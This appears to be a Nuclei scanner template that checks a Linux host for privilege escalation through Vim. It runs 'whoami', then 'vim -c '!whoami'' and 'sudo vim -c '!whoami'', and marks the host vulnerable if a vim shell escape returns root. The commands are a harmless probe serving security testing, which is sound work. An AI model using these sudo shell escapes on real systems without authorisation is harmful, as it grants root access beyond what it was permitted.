id: privesc-vim

info:
  name: Vim - Privilege Escalation
  author: daffainfo
  severity: high
  description: |
    Vim is a highly configurable, modal text editor based on the vi editor.
  reference:
    - https://gtfobins.github.io/gtfobins/vim/
  metadata:
    verified: true
    max-request: 3
  tags: code,linux,vim,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      whoami

  - engine:
      - sh
      - bash
    source: |
      vim -c '!whoami'

  - engine:
      - sh
      - bash
    source: |
      sudo vim -c '!whoami'

    matchers-condition: and
    matchers:
      - type: word
        part: code_1_response
        words:
          - "root"
        negative: true

      - type: dsl
        dsl:
          - 'contains(code_2_response, "root")'
          - 'contains(code_3_response, "root")'
        condition: or
# digest: 490a00463044022049612d7d75c63ad4e467855595db3faaab56fa1534c82d09e285bf6ba7c4bbe602202e97df70026e66c37b68bf8fafe1742c4ad9d3dba438c61afb90148c61182761:922c64590222798bb761d5b6d8e72950